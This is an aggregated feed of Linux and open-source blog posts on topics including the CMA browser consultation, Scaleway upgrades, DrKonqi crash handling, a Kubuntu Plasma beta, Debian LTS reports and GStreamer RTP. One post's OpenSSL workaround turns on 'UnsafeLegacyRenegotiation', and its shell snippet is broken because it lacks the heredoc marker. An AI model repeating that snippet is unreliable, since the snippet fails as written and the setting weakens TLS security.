If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

on June 17, 2022 10:33 AM

June 15, 2022

Dev Ops job?

Bryan Quigley

Dev Ops Job?

Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

on June 15, 2022 04:00 PM

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8 and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9 year old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90 day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigourously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

on June 15, 2022 12:00 AM

June 07, 2022

Hello world!

Salih Emin

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

on June 07, 2022 09:00 AM

June 04, 2022

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong, is if your VPS is using a bootscript. A bootscript is a fixed way for booting your Linux server and this included a generic Scaleway-provided Linux kernel. You would be running Ubuntu but the Linux kernel would be a common Scaleway Linux kernel among all Linux distributions. The config options would be set in stone and that would cause some issues. That situation changed and Scaleway now uses the distro Linux kernels. But since Scaleway sent an email about old Linux versions, then you need to check this one out.

To verify, go into the Advanced Settings, in Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, then the Linux kernel will stay the same as instructed by the bootscript. The proper Boot Mode should be “Use local boot” so that your VPS is using your distro’s Linux kernel. Fun fact #39192: If you offer Ubuntu to your users but you do not use the Ubuntu kernel, then Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu” because it’s not really real Ubuntu (the Linux kernel is not a stock Ubuntu Linux kernel). Since around 2019 Scaleway would default with the Use local boot Boot Mode. In my case it was indeed Use local boot, therefore I did not have to deal with bootscripts. I just clicked on Use bootscript for the purposes for this post; I did not apply this change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access? Specifically, if you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens up a browser window that gives you access to the Linux Console of the server, over the web. It’s separate from SSH, therefore if SSH access is not available but the server is still running, you can still access here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox. Anything that is based on chromium should work fine. It is not clear why it does not work. If you try to place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and Public-Key Authentication. For what is worth, the account could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you are upgrading the distribution with Debian and Ubuntu, and you do so over SSH, the installer/upgrader will tell you that it will open a backup SSH server on a different port, like 1022. It will also tell you to open that port, if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall of your Scaleway servers. That is, you can block access to certain ports if you specify them in the Security Group, and you have assigned those Scaleway servers in that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sort of questions along the way. Most likely, the upgrader will ask if you want to keep back a certain configuration file, or if you want to have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
...
$ sudo do-release-upgrade
...

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform an upgrade there. By doing so, you will note that you will be asked

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked specifically which services to restart or let the system do these automatically. You would consider this if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration. Or your Web servers will not start automatically and you need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
Fast-forward, the upgrade completed and we connect with SSH. Are are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.

Troubleshooting

You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP and normally the PHP package should update automatically. It actually does update automatically. The problem is with the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP. In Ubuntu the Unix socket looks like /run/php/php7.4-fpm.sock.

Ubuntu version Filename for the PHP Unix socket
Ubuntu 16.04 /run/php/php7.0-fpm.sock
Ubuntu 18.04 /run/php/php7.2-fpm.sock
Ubuntu 20.04 /run/php/php7.4-fpm.sock
The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and edit the PHP socket directory with the updated filename for the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ .php$ {
     include snippets/fastcgi-php.conf;
     #
     # # With php7.0-cgi alone:
     # fastcgi_pass 127.0.0.1:9000;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}

A request

Scaleway, if you are reading this, please have a look at this feature request.

on June 04, 2022 03:51 PM

May 25, 2022

DrKonqi ❤️ coredumpd

Harald Sitter

Get some popcorn and strap in for a long one! I shall delight you with some insights into crash handling and all that unicorn sparkle material.


Since Plasma 5.24 DrKonqi, Plasma’s infamous crash reporter, has gained support to route crashes through coredumpd and it is amazing – albeit a bit unused. That is why I’m telling you about it now because it’s matured a bit and is even more amazing – albeit still unused, I hope that will change.

To explain what any of this does I have to explain some basics first, so we are on the same page…

Most applications made by KDE will generally rely on KCrash, a KDE framework that implements crash handling, to, well, handle crashes. The way this works depends a bit on the operating system but one way or another when an application encounters a fault it first stops to think for a moment, about the meaning of life and whatever else, we call that “catching the crash”, during that time frame we can apply further diagnostics to help later figure out what went wrong. On POSIX systems specifically, we generate a backtrace and send that off to our bugzilla for handling by a developer – that is in essence the job of DrKonqi.

Currently DrKonqi operates in a mode of operation generally dubbed “just-in-time debugging”. When a crash occurs: KCrash immediately starts DrKonqi, DrKonqi attaches GDB to the still running process, GDB creates a backtrace, and then DrKonqi sends the trace along with metadata to bugzilla.

Just-in-time debugging is often useful on developer machines because you can easily switch to interactive debugging and also have a more complete picture of the environmental system state. For user systems it is a bit awkward though. You may not have time to deal with the report right now, you may have no internet connection, indeed the crash may be impossible to trace because of technical complications occurring during just-in-time debugging because of how POSIX signals work (threads continue running :O), etc.

In short: just-in-time really shouldn’t be the default.

Enter coredumpd.

Coredumpd is part of systemd and acts as kernel core handler. Ah, that’s a mouthful again. Let’s backtrace (pun intended)… earlier when I was talking about KCrash I only told part of the story. When fault occurs it doesn’t necessarily mean that the application has to crash, it could also neatly exit. It is only when the application takes no further action to alleviate the problem that the Linux kernel will jump in and do some rudimentary crash handling, forcefully. Very rudimentary indeed, it simply takes the memory state of the process and dumps it into a file. This is then aptly called a core dump. It’s kind of like a snapshot of the state of the process when the fault occurred and allows for debugging after the fact. Now things get interesting, don’t they? 🙂

So… KCrash can simply do nothing and let the Linux kernel do the work, and the Linux kernel can also be lazy and delegate the work to a so called core handler, an application that handles the core dumping. Well, here we are. That core handler can be coredumpd, making it the effective crash handler.

What’s the point you ask? — We get to be lazy!

Also, core dumping has one huge advantage that also is its disadvantage (depending on how you look at it): when a core dumps, the process is no longer running. When backtracing a core dump you are looking at a snapshot of the past, not a still running process. That means you can deal with crashes now or in 5 minutes or in 10 hours. So long as the core dump is available on disk you can trace the cause of the crash. This is further improved by coredumpd also storing a whole lot of metadata in journald. All put together it allows us to run drkonqi after-the-fact, instead of just-in-time. Amazing! I’m sure you will agree.

For the user everything looks the same, but under the hood we’ve gotten rid of various race conditions and gotten crash persistence across reboots for free!

Among other things this gives us the ability to look at past crashes. A GUI for which will be included in Plasma 5.25. Future plans also include the ability to file bug reports long after the fact.

Inner Workings

The way this works behind the scenes is somewhat complicated but should be easy enough to follow:

  • The application produces a fault
  • KCrash writes KCrash-specific metadata into a file on disk and doesn’t exit
  • The kernel issues a core dump via coredumpd
  • The systemd unit coredump@ starts
  • At the same time drkonqi-coredump-processor@ starts
  • The processor@ waits for coredump@ to finishes its task of dumping the core
  • The processor@ starts drkonqi-coredump-launcher@ in user scope
  • launcher@ starts DrKonqi with the same arguments as though it had been started just-in-time
  • DrKonqi assembles all the data to produce a crash report
  • the user is greeted by a crash notification just like just-in-time debugging
  • the entire crash reporting procedure is the same

Use It!

If you are using KDE neon unstable edition you are already using coredumpd based crash reporting for months! You haven’t even noticed, have you? 😉

If not, here’s your chance to join the after-the-fact club of cool kids.

KCRASH_DUMP_ONLY=1

in your `/etc/environment` and make sure your distribution has enabled the relevant systemd units accordingly.

on May 25, 2022 07:59 PM

May 22, 2022

Small EInk Phone

Bryan Quigley

Aside in 2022-05-22. it's not the same.. but there is a renewed push by Pebble creator Eric Migicovsky to show demand for a SmallAndroidPhone. It's currently at about 29,000.

Update 2022-02-26: Only got 12 responses which likely means there isn't that much demand for this product at this time (or it wasn't interesting enough to spread). Here are the results as promised:

What's the most you would be willing to spend on this? 7 - $200, 4 - $400. But that doesn't quite capture it. Some wanted even cheaper than $200 (which isn't doable) and others were will to spend a lot more.

Of the priority's that got at least 2 people agreeing (ignoring rating): 4 - Openness of components, Software Investments 3 - Better Modem, Headphone Jack, Cheaper Price 2 - Convergence Capable, Color eInk, Replaceable Battery

I'd guess about half of the respondents would likely be happy with a PinePhone (Pro) that got better battery life and "Just Works".

End Update.

Would you be interested in crowdfunding a small E Ink Open Phone? If yes, check out the specs and fill out the form below.

If I get 1000 interested people, I'll approach manufacturers. I plan to share the results publicly in either case. I will never share your information with manufacturers but contact you by email if this goes forward.

Basics:

  • Small sized for 2021 (somewhere between 4.5 - 5.2 inches)
  • E Ink screen (Maybe Color) - battery life over playing videos/games
  • To be shipped with one of the main Linux phone OSes (Manjaro with KDE Plasma, etc).
  • Low to moderate hardware specs
  • Likely >6 months from purchase to getting device

Minimum goal specs (we might be able to do much better than these, but again might not):

  • 4 Core
  • 32 GB Storage
  • USB Type-C (Not necessarily display out capable)
  • ~8 MP Front camera
  • GPS
  • GSM Modem (US)

Software Goals:

  • Only open source apps pre-installed
  • MMS/SMS
  • Phone calls
  • View websites / webapps including at least 1 rideshare/taxi service working (may not be official)
  • 2 day battery life (during "normal" usage)

Discussions: Phoronix

on May 22, 2022 04:30 AM

May 20, 2022

Are you using Kubuntu 22.04 Jammy Jellyfish, our current Stable release? Or are you already running our development builds of the upcoming 22.10 Kinetic Kudu?

We currently have Plasma 5.24.90 (Plasma 5.25 Beta)  available in our Beta PPA for Kubuntu 22.04, and in the Ubuntu archive and daily ISO build for the 22.10 development series.

However this is a beta release, and we should re-iterate the disclaimer from the upstream release announcement:

DISCLAIMER: Today we are bringing you the preview version of KDE’s Plasma 5.25 desktop release. Plasma 5.25 Beta is aimed at testers, developers, and bug-hunters. To help KDE developers iron out bugs and solve issues, install Plasma 5.25 Beta and test run the features listed below. Please report bugs to our bug tracker. We will be holding a Plasma 5.25 beta review day on May 26 (details will be published on our social media) and you can join us for a day of bug-hunting, triaging and solving alongside the Plasma devs! The final version of Plasma 5.25 will become available for the general public on the 14th of June. DISCLAIMER: This release contains untested and unstable software. It is highly recommended you do not use this version in a production environment and do not use it as your daily work environment. You risk crashes and loss of data.

https://kde.org/announcements/plasma/5/5.24.90

Testers of the Kubuntu 22.10 Kinetic Kudu development series:

Testers with a current install can simply upgrade their packages to install the 5.25 Beta.

Alternatively, a live/install image is available at: http://cdimage.ubuntu.com/kubuntu/daily-live/current/

Users on Kubuntu 22.04 Jammy Jellyfish:

5.25 Beta packages and required dependencies are available in our Beta PPA.

The PPA should work whether you are currently using our backports PPA or not.

If you are prepared to test via the PPA, then…..

Add the beta PPA and then upgrade:

sudo add-apt-repository ppa:kubuntu-ppa/beta && sudo apt full-upgrade -y

Then reboot.

In case of issues, testers should be prepared to use ppa-purge to remove the PPA and revert/downgrade packages.

Kubuntu is part of the KDE community, so this testing will benefit both Kubuntu as well as upstream KDE Plasma software, which is used by many other distributions too.

  • If you believe you might have found a packaging bug, you can use launchpad.net to post testing feedback to the Kubuntu team as a bug, or give feedback on IRC [1], or mailing lists [2].
  • If you believe you have found a bug in the underlying software, then bugs.kde.org is the best place to file your bug report.

Please review the release announcement and changelog.

[Test Case]
* General tests:
– Does plasma desktop start as normal with no apparent regressions over 5.24?
– General workflow – testers should carry out their normal tasks, using the plasma features they normally do, and test common subsystems such as audio, settings changes, compositing, desktop affects, suspend etc.
* Specific tests:
– Check the changelog:
– Identify items with front/user facing changes capable of specific testing.
– Test the ‘fixed’ functionality or ‘new’ feature.

Testing may involve some technical set up to do, so while you do not need to be a highly advanced K/Ubuntu user, some proficiently in apt-based package management is advisable.

Testing is very important to the quality of the software Ubuntu and Kubuntu developers package and release.

We need your help to get this important beta release in shape for Kubuntu and the KDE community as a whole.

Thanks!

Please stop by the Kubuntu-devel IRC channel on libera.chat if you need clarification of any of the steps to follow.

[1] – #kubuntu-devel on libera.chat
[2] – https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel

on May 20, 2022 05:06 PM

May 10, 2022

Here’s my (thirty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.

Debian

This was my 41st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions and things bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.

Ubuntu

This was my 16th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D


Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-second month as a Debian LTS and twenty-third month as a Debian ELTS paid contributor.
I worked for 35.00 hours for LTS and 30.00 hours for ELTS.

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Triaged cifs-utils, vim, elog, needrestart, amd64-microcode, libgoogle-gson-java, lrzip, and mutt.
  • Started as a Freexian Collaborator! \o/
  • Read through the documentation bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • Participated and helped fellow members with theie queries via private mail and chat.
  • General and other discussions on LTS private and public mailing list.

Debian LTS Survey

I’ve spent 2 hours on the LTS survey on the following bits:

  • Finalizing and wrapping up the survey.
  • Providing the stats, working on the initial export of the survey.
  • Dropping ghost entries and other things which are useless. :)

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

Here’s my (thirty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.

Debian

This was my 40th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

  • Helped Andrius w/ FTBFS for php-text-captcha, reported via #977403.
    • I fixed the samed in Ubuntu a couple of months ago and they copied over the patch here.

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions of referees and attendees around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.

Ubuntu

This was my 15th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D


Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-first month as a Debian LTS and twentieth month as a Debian ELTS paid contributor.
I worked for 23.25 hours for LTS and 20.00 hours for ELTS.

LTS CVE Fixes and Announcements:

  • Issued DLA 2976-1, fixing CVE-2022-1271, for gzip.
    For Debian 9 stretch, these problems have been fixed in version 1.6-5+deb9u1.
  • Issued DLA 2977-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 9 stretch, these problems have been fixed in version 5.2.2-1.2+deb9u1.
  • Working on src:tiff and src:mbedtls to fix the issues, still waiting for more issues to be reported, though.
  • Looking at src:mutt CVEs. Haven’t had the time to complete but shall roll out next month.

ELTS CVE Fixes and Announcements:

  • Issued ELA 593-1, fixing CVE-2022-1271, for gzip.
    For Debian 8 jessie, these problems have been fixed in version 1.6-4+deb8u1.
  • Issued ELA 594-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 8 jessie, these problems have been fixed in version 5.1.1alpha+20120614-2+deb8u1.
  • Issued ELA 598-1, fixing CVE-2019-16935, CVE-2021-3177, and CVE-2021-4189, for python2.7.
    For Debian 8 jessie, these problems have been fixed in version 2.7.9-2-ds1-1+deb8u9.
  • Working on src:tiff and src:beep to fix the issues, still waiting for more issues to be reported for src:tiff and src:beep is a bit of a PITA, though. :)

Other (E)LTS Work:

  • Triaged gzip, xz-utils, tiff, beep, python2.7, python-django, and libgit2,
  • Signed up to be a Freexian Collaborator! \o/
  • Read through some bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.
  • Attended monthly Debian meeting. Held on Jitsi this month.

Debian LTS Survey

I’ve spent 18 hours on the LTS survey on the following bits:

  • Rolled out the announcement. Started the survey.
  • Answered a bunch of queries, people asked via e-mail.
  • Looked at another bunch of tickets: https://salsa.debian.org/freexian-team/project-funding/-/issues/23.
  • Sent a reminder and fixed a few things here and there.
  • Gave a status update during the meeting.
  • Extended the duration of the survey.

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

May 04, 2022

Contributing to any open-source project is a great way to spend a few hours each month. I started more than 10 years ago, and it has ultimately shaped my career in ways I couldn’t have imagined!

GitLab logo as cover

The new GitLab logo, just announced on the 27th April 2022.

Nowadays, my contributions focus mostly on GitLab, so you will see many references to it in this blog post, but the content is quite generalizable; I would like to share my experience to highlight why you should consider contributing to an open-source project.

Writing blog posts, tweeting, and helping foster the community are nice ways to contribute to a project ;-)

And contributing doesn’t mean only coding: there are countless ways to help an open-source project: translating it to different languages, reporting issues, designing new features, writing the documentation, offering support on forums and StackOverflow, and so on.

Before deep diving in this wall of text, be aware there are mainly three parts in this blog post, after this introduction: a context section, where I describe my personal experience with open source, and what does it mean to me. Then, a nice list of reasons to contribute to any project. In closing, there are some tips on how to start contributing, both in general, and something specific to GitLab.

Context

Ten years ago, I was fresh out of high school, without (almost) any knowledge about IT: however, I found out that I had a massive passion for it, so I enrolled in a Computer Engineering university (boring!), and I started contributing to Ubuntu (cool!). I began with the Italian Local Community, and I soon moved to Ubuntu Touch.

I often considered rewriting that old article: however I have a strange attachment to it as it is, with all that English mistakes. One of the first blog posts I have written, and it was really well received! We all know how it ended, but it still has been a fantastic ride, with a lot of great moments: just take a look at the archive of this blog, and you can see the passion and the enthusiasm I had. I was so enthusiast, that I wrote a similar blog post to this one! I think it highlights really well some considerable differences 10 years make.

Back then, I wasn’t working, just studying, so I had a lot of spare time. My English was way worse. I was at the beginning of my journey in the computer world, and Ubuntu has ultimately shaped a big part of it. My knowledge was very limited, and I never worked before. Contributing to Ubuntu gave me a glimpse of real world, I met outstanding engineers who taught me a lot, and boosted my CV, helping me to land my first job.

Advocacy, as in this blog post, is a great way to contribute! You spread awareness, and this helps to find new contributors, and maybe inspiring some young student to try out! Since then, I completed a master’s degree in C.S., worked in different companies in three different countries, and became a professional. Nowadays, my contributions to open source are more sporadic (adulthood, yay), but given how much it meant to me, I am still a big fan, and I try to contribute when I can, and how I can.

Why contributing

Friends

During my years contributing to open-source software, I’ve met countless incredible people, with some of whom I’ve become friend. In the old blog post I mentioned David: in the last 9 years we stayed in touch, met in different occasions in different cities: last time was as recent as last summer. Back at the time, he was a Manager in the Ubuntu Community Team at Canonical, and then, he became Director of Community Relations at GitLab. Small world!

The Ubuntu Touch Community Team in Malta, in 2014

The Ubuntu Touch Community Team in Malta, in 2014. It has been an incredible week, sponsored by Canonical!

One interesting thing is people contribute to open-source projects from their homes, all around the world: when I travel, I usually know somebody living in my destination city, so I’ve always at least one night booked for a beer with somebody I’ve met only online; it’s a pleasure to speak with people from different backgrounds, and having a glimpse in their life, all united by one common passion.

Fun

Having fun is important! You cannot spend your leisure time getting bored or annoyed: contributing to open source is fun ‘cause you pick the problems you would like to work on, and you don’t need all that bureaucracy and meetings that is often needed in your daily job. You can be challenged, and feeling useful, and improving a product, without any manager on your shoulder, and with your pace.

Being up-to-date on how things evolve

For example, the GitLab Handbook is a precious collection of resources, ideas, and methodologies on how to run a 1000 people company in a transparent, full remote, way. It’s a great reading, with a lot of wisdom.

Contributing to a project typically gives you an idea on how teams behind it work, which technologies they use, and which methodologies. Many open-source projects use bleeding-edge technologies, or draw a path. Being in contact with new ideas is a great way to know where the industry is headed, and what are the latest news: it is especially true if you hang out in the channels where the community meets, being them Discord, forums, or IRC (well, IRC is not really bleeding-edge, but it is fun).

Learning

When contributing in an area that doesn’t match your expertise, you always learn something new: reviews are usually precise and on point, and projects of a remarkable size commonly have a coaching team that help you to start contributing, and guide you on how to land your first patches.

In GitLab, if you need a help in merging your code, there are the Merge Request Coaches! And for any type of help, you can always join Gitter, or ask on the forum, or write to the dedicated email address.

Feel also free to ping me directly if you want some general guidance!

Giving back

I work as a Platform Engineer. My job is built on an incredible amount of open-source libraries, amazing FOSS services, and I basically have just to glue together different pieces. When I find some rough edge that could be improved, I try to do so.

Nowadays, I find crucial having well-maintained documentation, so after I have achieved something complex, I usually go back and try to improve the documentation, where lacking. It is my tiny way to say thanks, and giving back to a world that really has shaped my career.

This is also what mostly of my blogs posts are about: after having completed something on which I spent fatigue on, I find it nice being able to share such information. Every so often, I find myself years later following my guide, and I really also appreciate when other people find the content useful.

Swag

Who doesn’t like swag? :-) Numerous projects have delightful swags, starting from stickers, that they like to share with the whole community. Of course, it shouldn’t be your main driver, ‘cause you will soon notice that it is ultimately not worth the amount of time you spend contributing, but it is charming to have GitLab socks!

A GitLab branded mechanical keyboard

A GitLab branded mechanical keyboard, courtesy of the GitLab's security team! This very article has been typed with it!

Tips

I hope I inspired you to contribute to some open-source project (maybe GitLab!). Now, let’s talk about some small tricks on how to begin easily.

Find something you are passionate about

You must find a project you are passionate about, and that you use frequently. Looking forward to a release, knowing that your contributions will be included, it is a wonderful satisfaction, and can really push you to do more.

Moreover, if you already know the project you want to contribute to, you probably know already the biggest pain points, and where the project needs some contributions.

Start small and easy

You don’t need to do gigantic contributions to begin. Find something tiny, so you can get familiar with the project workflows, and how contributions are received.

Launchpad and bazaar instead of GitLab and git — down the memory lane! My journey with Ubuntu started correcting a typo in a README, and here I am, years later, having contributed to dozens of projects, and having a career in the C.S. field. Back then, I really had no idea of what my future would have held.

For GitLab, you can take a look at the issues marked as “good for new contributors”. They are designed to be addressed quickly, and onboard new people in the community. In this way, you don’t have to focus on the difficulties of the task at hand, but you can easily explore how the community works.

Writing issues is a good start

Writing high-quality issues is a great way to start contributing: maintainers of a project are not always aware of how the software is used, and cannot be aware of all the issues. If you know that something could be improved, write it down: spend some time explicating what happens, what you expect, how to reproduce the problem, and maybe suggest some solutions as well! Perhaps, the first issue you write down could be the very first issue you resolve.

Not much time required!

Contributing to a project doesn’t require necessarily a lot of time. When I was younger, I definitely dedicated way more time to open-source projects, implementing gigantic features. Nowadays, I don’t do that anymore (life is much more than computers), but I like to think that my contributions are still useful. Still, I don’t spend more than a couple of hours a month, based on my schedule, and how much is raining (yep, in winter I definitely contribute more than in summer).

GitLab is super easy

Do you use GitLab? Then you should undoubtedly try to contribute to it. It is easy, it is fun, and there are many ways. Take a look at this guide, hang out on Gitter, and see you around. ;-)

Next week (9th-13th May 2022) there is also a GitLab Hackathon! It is a real fun and easy way to start contributing: many people are available to help you, there are video sessions talking about contributing, and just doing a small contribution you will receive a pretty prize.

And if I was able to do it with my few contributions, you can as well! And in time, if you are consistent in your contributions, you can become a GitLab Hero! How cool is that?

I really hope this wall of text made you consider contributing to an open-source project. If you have any question, or feedback, or if you would like some help, please leave a comment below, tweet me @rpadovani93 or write me an email at hello@rpadovani.com.

Ciao,
R.

on May 04, 2022 12:00 AM

May 02, 2022

Sorry, I should have posted this weeks ago to save others some time.

If you are running openconnect-sso to connect to a Cisco anyconnect VPN, then when you upgrade to Ubuntu Jammy, openssl 3.0 may stop openconnect from working. The easiest way to work around this is to use a custom configuration file as follows:


cat > $HOME/ssl.cnf
openssl_conf = openssl_init

[openssl_init]
ssl_conf = ssl_sect

[ssl_sect]
system_default = system_default_sect

[system_default_sect]
Options = UnsafeLegacyRenegotiation
EOF

Then use this configuration file (only) when running openconnect:


OPENSSL_CONF=~/ssl.cnf openconnect-sso --server=your-server.whatever.com

on May 02, 2022 02:39 PM

Over the last few weeks, GStreamer’s RTP stack got a couple of new and quite useful features. As it is difficult to configure, mostly because there being so many different possible configurations, I decided to write about this a bit with some example code.

The features are RFC 6051-style rapid synchronization of RTP streams, which can be used for inter-stream (e.g. audio/video) synchronization as well as inter-device (i.e. network) synchronization, and the ability to easily retrieve absolute sender clock times per packet on the receiver side.

Note that each of this was already possible before with GStreamer via different mechanisms with different trade-offs. Obviously, not being able to have working audio/video synchronization would be simply not acceptable and I previously talked about how to do inter-device synchronization with GStreamer before, for example at the GStreamer Conference 2015 in Düsseldorf.

The example code below will make use of the GStreamer RTSP Server library but can be applied to any kind of RTP workflow, including WebRTC, and are written in Rust but the same can also be achieved in any other language. The full code can be found in this repository.

And for reference, the merge requests to enable all this are [1], [2] and [3]. You probably don’t want to backport those to an older version of GStreamer though as there are dependencies on various other changes elsewhere. All of the following needs at least GStreamer from the git main branch as of today, or the upcoming 1.22 release.

Baseline Sender / Receiver Code

The starting point of the example code can be found here in the baseline branch. All the important steps are commented so it should be relatively self-explanatory.

Sender

The sender is starting an RTSP server on the local machine on port 8554 and provides a media with H264 video and Opus audio on the mount point /test. It can be started with

$ cargo run -p rtp-rapid-sync-example-send

After starting the server it can be accessed via GStreamer with e.g. gst-play-1.0 rtsp://127.0.0.1:8554/test or similarly via VLC or any other software that supports RTSP.

This does not do anything special yet but lays the foundation for the following steps. It creates an RTSP server instance with a custom RTSP media factory, which in turn creates custom RTSP media instances. All this is not needed at this point yet but will allow for the necessary customization later.

One important aspect here is that the base time of the media’s pipeline is set to zero

pipeline.set_base_time(gst::ClockTime::ZERO);
pipeline.set_start_time(gst::ClockTime::NONE);

This allows the timeoverlay element that is placed in the video part of the pipeline to render the clock time over the video frames. We’re going to use this later to confirm on the receiver that the clock time on the sender and the one retrieved on the receiver are the same.

let video_overlay = gst::ElementFactory::make("timeoverlay", None)
    .context("Creating timeoverlay")?;
[...]
video_overlay.set_property_from_str("time-mode", "running-time");

It actually only supports rendering the running time of each buffer, but in a live pipeline with the base time set to zero the running time and pipeline clock time are the same. See the documentation for some more details about the time concepts in GStreamer.

